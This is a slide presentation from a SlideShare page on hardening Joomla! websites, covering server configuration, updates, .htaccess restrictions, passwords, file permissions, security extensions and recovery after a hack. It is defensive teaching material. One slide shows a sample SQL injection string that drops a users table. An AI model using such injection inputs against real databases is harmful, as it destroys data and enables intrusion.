Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Hidden Secrets For A Hack-Proof Joomla! Site

737 views

Published on

This presentation provides information about the most common Joomla! attacks and how to protect from them. The basics of securing Joomla! sites are covered in details.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Hidden Secrets For A Hack-Proof Joomla! Site

  1. 1. HIDDEN SECRETS FOR A HACK-PROOF JOOMLA! Daniel Kanchev @dvkanchev
  2. 2. BEFORE WE BEGIN … ✓ 7+ Years Of Joomla! Experience ✓ 6 Years With SiteGround ✓ Love Travelling The World ✓ Addicted To Extreme Sports
  3. 3. WHO SHOULD CARE ABOUT SECURITY ? ✓ Application/Extension Developers ✓ Hosting Providers/System Administrators ✓ YOU (End Joomla! Users)
  4. 4. EVERYONE WHO SHOULD CARE ABOUT SECURITY ? ✓Application/Extension Developers ✓Hosting Providers/System Administrators ✓YOU (End Joomla! Users)
  5. 5. WHY SHOULD YOU CARE ? ✓ Be Trustworthy By Protecting Your Clients’ Data ✓ Have A Healthy Site - Avoid Substantial Data Loss/Downtime
  6. 6. HOW HACKERS WORK?
  7. 7. EVERYONE’S RESPONSIBLE!
  8. 8. SECURITY IS A PROCESS! ! ! KEEP CALM IT’S NOT ROCKET SCIENCE
  9. 9. IS YOUR SERVER SETUP RIGHT?
  10. 10. SERVER CONFIG & TIPS ✓ Always Update Your Server Software ✓ Harden The Linux Kernel - grsecurity ✓ Chroot Processes ✓ Provide Only Restricted Shell Access ✓ Disable/Remove Unused Services SOLUTIONS: 1H Hive, Better Linux, CloudLinux
  11. 11. PROTECT YOUR WEB SERVER ✓ OWASP Rules - http://goo.gl/rC7Uz ✓ Atomic Rules - http://goo.gl/Fv3Vn ✓ Trustwave Paid Rules - http://goo.gl/9IAaB
  12. 12. PROTECT JOOMLA!
  13. 13. #1: UPDATE EVERYTHING!
  14. 14. SITEGROUND AUTO UPDATES
  15. 15. #2: DO THE BASICS ✓ Change The Default “admin” username ✓ Change The Default “jos_” DB Prefix ✓ Password Protect Your Administrator Folder
  16. 16. #3: RESTRICT THE ADMIN AREA BY IP ✓ Step 1: Check Your IP: whatismyip.com ✓ Add This Rule To Your .htaccess File deny from all allow from YOUR_IP_ADDRESS
  17. 17. #4: KEEP PHP SCRIPTS IN THE RIGHT FOLDERS <Files *.php> deny from all </Files>
  18. 18. #5: USE BULLET-PROOF PASSWORDS ✓ Avoid password generators ✓ Don’t use common words ✓ Avoid personal info, names and significant dates: daniel123
  19. 19. THE PERFECT PASSWORD ✓ Choose A Favourite (Not Famous) Movie Quote/Phrase From A Book: We all go a little mad sometimes ✓ Add Punctuation Symbols (?!.,:) And Capital Letters, Remove Whitespaces: We.all?go!AlittleMad2sometimes
  20. 20. #6: CHECK YOUR EXTENSIONS ✓Joomla! Vulnerable Extensions List (VEL): http://vel.joomla.org/ ✓National Vulnerability Database: http://web.nvd.nist.gov/view/vuln/search
  21. 21. #7: STAY ON TOP OF SECURITY UPDATES ✓http://feeds.joomla.org/JoomlaSecurityNews ✓http://feeds.joomla.org/ JoomlaSecurityVulnerableExtensions
  22. 22. BUILD A JOOMLA! SECURITY RSS FEED HOW TO DO IT: http://is.gd/Vze1Zo
  23. 23. #8: FIX YOUR PERMISSIONS AND OWNERSHIP ✓Folders: 0755 ✓Files: 0644 ✓All files/folders should be owned by your main FTP user ✓NEVER EVER USE 777 permissions
  24. 24. #9: ADDITIONAL PROTECTION THROUGH .htaccess FILE ✓ Remove PHP Sensitive Information ✓ Avoid Visual FingerPrinting ✓ Block Some Popular Tools Used By Hackers How To Do It: http://is.gd/pGfVXQ
  25. 25. #10: USE JOOMLA! SECURITY EXTENSIONS FOR IDS/IPS ✓jHackGuard ✓ Akeeba Admin Tools ✓ jomDefender ✓jSecure
  26. 26. SQL INJECTION SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';
  27. 27. jHackGuard SETUP ✓ SQL Injections ✓ Remote URL/File Inclusions ✓ Remote Code Execution ✓ XSS Based Attacks
  28. 28. #11: BACKUP! BACKUP! BACKUP!
  29. 29. NOW WHAT?
  30. 30. DON’T PANIC!
  31. 31. DISASTER RECOVERY PLAN 1. Create A Copy Of The Hacked Site + All Logs 2. Restore From A Clean Backup 3. Quarantine Your Site - Maintenance Mode 4. Check The Logs For The Malicious Code 5. Resolve The Security Issues/Clean Malicious Code 6. Unquarantine Your Site
  32. 32. FEW THINGS TO TAKE AWAY ✓ Security Is About Making It Harder To Infiltrate - Not Making It Impossible ✓ Security Is An Ongoing Process ✓ Everyone Is Involved
  33. 33. QUESTIONS ?
  34. 34. THANK YOU! Daniel Kanchev @dvkanchev

×